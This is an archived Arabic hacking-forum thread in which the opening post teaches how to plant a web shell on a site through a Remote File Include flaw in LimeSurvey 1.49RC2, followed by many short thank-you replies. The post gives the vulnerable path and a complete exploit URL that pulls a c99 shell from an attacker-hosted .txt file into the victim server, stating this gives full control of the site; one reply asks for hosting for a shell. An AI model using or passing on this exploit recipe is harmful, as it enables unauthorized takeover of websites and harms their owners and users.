المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : طرق رفع الشل الجزء 2



BLACK.JaGuAr
10-04-2009, 06:43 PM
http://www.samysoft.net/forumim/slambasmla/5464564.gif


كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....


- رفع الشيل عبر ثغرات File Include فايل إنكلود -


اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع


milw0rm (http://www.milw0rm.com)

SecurityReason.com - Our Reason is Security (http://www.securityreason.com)



أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :


http://www.aljyyosh.info/upfiles/DiL14999.jpg


كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...


طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
1- نوع الثغره ومن الصورة نجد أن نوعها هو ..

Type : RFI(Remote File Include)

أي ثغره من نوع فايل إنكلود .

2- اسم السكربت المصاب :

****** name : LimeSurvey (PHPSurveyor)


3-الإصدار المصاب وهو :

Version : 1.49RC2





المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :

/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]





الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :

http://victim.com

والسكربت المصاب والإصدار هو :

LimeSurvey والإصدار 1.49RC2

وهو راكب عليه هكذا :

http://victim.com/ls




إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :

http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]





بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :

http://mysite.com/black/c99.txt

لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل





وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :


http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?


وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :

http://mysite.com/black/c99.txt

داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..




وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله


ودمتم سالمين

System 32
10-05-2009, 11:02 PM
رووووووووووووووووووعه يعطيك الف عافيه
تقبل مروووري

هاوي حنانك
10-06-2009, 10:07 AM
الله يعطيك العافيه مجهووود رااائع ,,,,,,,,,,,,,,,,

sticky 1008
12-06-2009, 11:43 AM
الله يعطيك العافيه

اسد سوريا
12-06-2009, 11:58 AM
عاشت ايدك يامشرفنا

Dr.R00T
12-09-2009, 12:52 PM
تسلم يدينك والله

مشكووووووووووووووور على الدرس والشرح الوافي

تقبل مروري

ysooof
01-16-2010, 12:38 AM
إنت خطير
مشكور حبيبي

والله يعطيييييييييييك مليون عافية

coch007
02-18-2010, 02:10 PM
مشكوووووووووووووووووووور

HACK-IT
03-05-2010, 09:47 PM
مشكووووووورررررر يالغالى أخى أريد سيرفر مجانى أرفع عليه الشل تبعى هل تعرف

hamuda
04-14-2010, 01:44 PM
مشكور اخي على المجهود الطيب

saw-19
05-13-2010, 11:34 PM
مشكور اخي على المجهود الطيب

ynoof
05-14-2010, 11:03 PM
مشكوووووووووووووووووووووو ووووووووووووووووووور

makaveli
05-18-2010, 09:08 PM
:::::::::ooknxx

sniper-9
05-19-2010, 08:56 AM
يسلموووووووووووووووو ع شرح

ssimple_Hacker
05-19-2010, 11:06 AM
مشكور يعطيك عافيه

سامي144
05-21-2010, 04:08 AM
مشكوووووووووووووووووووور

ddcc
05-21-2010, 02:45 PM
الف شكر بلاك جيكغوار موبس و واصل ابداعك

ashrafaf
05-22-2010, 03:01 PM
mashkooooooooooooooooooooooor

abdo0o0
05-24-2010, 06:48 PM
مشكوووووووووور
مشكوووووووووووووووور
مشكوووووووووووووووووووووو ر
©§¤°يسلموو°¤§©¤ــ¤©§¤°حلو و°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــ¤©§¤°حلوو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــ¤©§¤°حلووو و°¤§ ©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــ¤© §¤°حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ــــــــ ¤©§¤°حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــ¤©§¤ °حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ــــــــ¤©§¤°حلوووو° ¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ـــــــــــــــــ¤©§ ¤°حلو ووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــــــ ــــــــ¤©§¤°حلوووو° ¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ـــــــــــــــــــــ¤©§¤ °حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــــ ــــــــ ¤©§¤°حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــــــــــــ ــ¤© §¤°حلوووو°¤§©
©§¤°يسلموو°¤§©¤ــــــــــ ـــــــــــ¤©§¤°حلووو و°¤§ ©
©§¤°يسلموو°¤§©¤ــــــــــ ـــ¤©§¤°حلوو°¤§©
©§¤°يسلموو°¤§©¤ــ¤©§¤°حلو و°¤§©
مشكوووووووووووووووووووووو ر
مشكوووووووووووووووور

دمت في تألق وابداع

خارج عن القانون
07-12-2010, 01:35 PM
مشكور يابطل

فارس2009
07-12-2010, 09:13 PM
الشرح قديم عام 2007 شوف اسفل الصورة بالركن
يعني نحن الان نتعلم ماهو مفروض نتعلمه في 2007 متاخرين 3 سنين
ليه كذا كل العالم نقل ياخي هات الطريقه من راسك
اشرحها بطريقتك
وتقبل تحياتي انا مليت بصراحه من الف بالمنتديات وهو الخبر هذا بكل المنتديات وين التميز
ابحثو عنه خل العالم ينقل منك

سلام

Resident Evil
09-01-2010, 04:15 AM
ملك يابطل بارك الله فيك

back-connect
09-21-2010, 12:07 PM
شرح جميل
واصل ابداعك

ابو رحيّم
09-25-2010, 10:42 AM
مشكووووووووور ياااااابطل شرح فللــه يعطيك العافيـــــــه

satan-jxx
09-26-2010, 02:03 PM
http://i66.servimg.com/u/f66/14/16/50/10/1010.gif

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif
.......
.....
...
.

سلمت يداك وكتبها الله في ميزان حسناتك

http://i66.servimg.com/u/f66/14/16/50/10/620-jz10.gif

منتديات جيوش الهكرز
جيوش الهكر أكبر منتدى هكر عربي مختص بتعليم الاختراق والحماية
لا حدود للمعرفة لا حدود للاختراق لا حدود للاحتراف
www.aljyyosh.com (http://www.aljyyosh.com)
.
...
.....
.......

http://i66.servimg.com/u/f66/14/16/50/10/ff13110.gif

http://i66.servimg.com/u/f66/14/16/50/10/810.gif

elnoby
01-09-2011, 02:15 PM
بص انا مش عارف اشكرك ازاى بس بجد مجهود رائع و المزيد من التقدم

شكراااااااااااااااااااااا ااااااااااااااااااااااااا اااااااا على الشرح الوافى

HaCkeRz3_____ AaLlGEEr!Ia
04-23-2011, 11:05 PM
ممتاز اخي مشكور كثيرا بارك الله فيك

Mad Devil
04-24-2011, 09:57 AM
مشكورر يالحبيب تسلم ماقصرت

تحياتي

V!RUS TROJAN
04-29-2011, 04:46 PM
يعطيك الف عافيه يا وحش ننتضر المزيد من ابداعاتك

HaCkeRz3_____ AaLlGEEr!Ia
05-03-2011, 04:43 PM
مشكور حبيبي تسلم هد الدرس كل يوم اعيد دراستو
و الله غير شرح مفصل و بارك الله فيك حبيبي

Ace
05-09-2011, 06:35 PM
بارك الله فيك بلاك